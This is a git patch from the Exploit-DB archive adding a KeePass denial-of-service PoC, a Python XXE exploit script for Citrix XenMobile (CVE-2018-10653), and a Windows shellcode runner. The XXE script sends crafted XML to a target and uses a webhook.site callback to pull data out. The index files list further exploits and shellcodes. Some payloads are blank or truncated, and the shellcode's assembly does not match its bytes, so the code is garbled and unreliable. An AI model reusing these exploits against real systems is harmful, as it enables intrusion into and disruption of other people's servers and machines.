From 82e6691834ca87d870b660ed162b2762c7b24143 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 23 Jan 2020 05:02:01 +0000 Subject: [PATCH] DB: 2020-01-23 4 changes to exploits/shellcodes KeePass 2.44 - Denial of Service (PoC) Citrix XenMobile Server 10.8 - XML External Entity Injection Windows/7 - Screen Lock Shellcode (9 bytes) --- exploits/multiple/dos/47952.txt | 109 +++++++++++++++++++++++++++++++ exploits/windows/local/47950.txt | 11 ---- exploits/xml/webapps/47951.py | 47 +++++++++++++ files_exploits.csv | 2 + files_shellcodes.csv | 1 + shellcodes/windows/47953.c | 31 +++++++++ 6 files changed, 190 insertions(+), 11 deletions(-) create mode 100644 exploits/multiple/dos/47952.txt create mode 100755 exploits/xml/webapps/47951.py create mode 100644 shellcodes/windows/47953.c diff --git a/exploits/multiple/dos/47952.txt b/exploits/multiple/dos/47952.txt new file mode 100644 index 000000000..826ef9c12 --- /dev/null +++ b/exploits/multiple/dos/47952.txt @@ -0,0 +1,109 @@ +# Exploit Title : KeePass 2.44 - Denial of Service (PoC) +# Product : KeePass Password Safe +# Version : < 2.44 +# Date: 2020-01-22 +# Vendor Homepage: https://keepass.info/ +# Exploit Author: Mustafa Emre Gül +# Website: https://emregul.com.tr/ +# Tested On : Win10 x64 +# Description : The free, open source, light-weight and easy-to-use password manager. + + +PoC: +Open KeePass > Help > About KeePass > Help (any local help area) > +Drag&Drop HTML File + +Save the contents to html. + + +Payload-1: +(DoS & Run Cmd) + + + + + + +Payload-2: +(run iexplorer.exe & download infected file) + + + +Edition Mode Active + \ No newline at end of file diff --git a/exploits/windows/local/47950.txt b/exploits/windows/local/47950.txt index 5d9e87f28..bb8dfa2f3 100644 --- a/exploits/windows/local/47950.txt +++ b/exploits/windows/local/47950.txt @@ -157,13 +157,6 @@ chunk_sz=5 #number of bytes we must decrypt the password by. #Apparition Security #=================================================== -def haslib(lib): - if not lib in (name for loader, name, ispkg in iter_modules()): - print("[!] "+lib+ " does not exist, pip install "+lib) - exit() - return True - - def carbonftp_conf(conf_file): p="" pipe=-1 @@ -325,8 +318,6 @@ def main(args): global passwd_str, sz victim="" - haslib("clint") - if args.user and args.encrypted_password: print("[!] Supply a victims username -u or single encrypted password -p, not both.") exit() @@ -380,8 +371,6 @@ if __name__=="__main__": main(parse_args()) - - [POC Video URL] https://www.youtube.com/watch?v=q9LMvAl6LfE diff --git a/exploits/xml/webapps/47951.py b/exploits/xml/webapps/47951.py new file mode 100755 index 000000000..b8b331b85 --- /dev/null +++ b/exploits/xml/webapps/47951.py @@ -0,0 +1,47 @@ +# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection +# Google Dork: inurl:zdm logon +# Date: 2019-11-28 +# Exploit Author: Jonas Lejon +# Vendor Homepage: https://www.citrix.com +# Software Link: +# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3 +# Tested on: XenMobile +# CVE : CVE-2018-10653 + +#!/usr/bin/python3 +## +## PoC exploit test for the security vulnerability CVE-2018-10653 in +XenMobile Server 10.8 before RP2 and 10.7 before RP3 +## +## This PoC was written by Jonas Lejon 2019-11-28 + https://triop.se +## Reported to Citrix 2017-10, patch released 2018-05 +## + +import requests +import sys +from pprint import pprint +import uuid + +# Surf to https://webhook.site and copy/paste the URL below. Used for +XXE callback +WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/" + +id = str(uuid.uuid1()) + +xml = '''%j00t9; ]>''' + +print(id) + +response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False, + headers= +{'User-Agent': 'MDM/1.0', +'Connection': 'close', +'Content-Type': 'application/x-apple-aspen-mdm'}, +data=xml,stream=True +) +print(response.content) +print(response.text) +pprint(response) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4978c08e6..cfe324f53 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6660,6 +6660,7 @@ id,file,description,date,author,type,platform,port 47937,exploits/windows/dos/47937.py,"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows, 47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows, 47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows, +47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -42251,3 +42252,4 @@ id,file,description,date,author,type,platform,port 47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php, 47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php, 47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java, +47951,exploits/xml/webapps/47951.py,"Citrix XenMobile Server 10.8 - XML External Entity Injection",2020-01-22,"Jonas Lejon",webapps,xml, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index e115ce87d..621d1bf6d 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1012,3 +1012,4 @@ id,file,description,date,author,type,platform 47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64 47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux 47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux +47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows diff --git a/shellcodes/windows/47953.c b/shellcodes/windows/47953.c new file mode 100644 index 000000000..7807aa510 --- /dev/null +++ b/shellcodes/windows/47953.c @@ -0,0 +1,31 @@ +# Title: Windows/7 - Screen Lock Shellcode (9 bytes) +# Author: Saswat Nayak +# Date: 2020-01-22 +# Shellcode length 9 +# Tested on: Win 7 SP1-64 + +/* +***** Assembly code follows ***** +xor eax,eax +xor ebx,ebx +xor ecx,ecx +mov eax,0x00000002 +mov ebx,0x00020000 +push ebx +push al +mov ecx,0x77661497 +call ecx + + +*/ + +char code[]= + +"\x31\xC0\xB8\x6F\x86\x67\x77\xFF\xD0"; + +int main(int argc, char **argv) + { +int (*func)(); +func = (int (*)()) code; +(int)(*func)(); +} \ No newline at end of file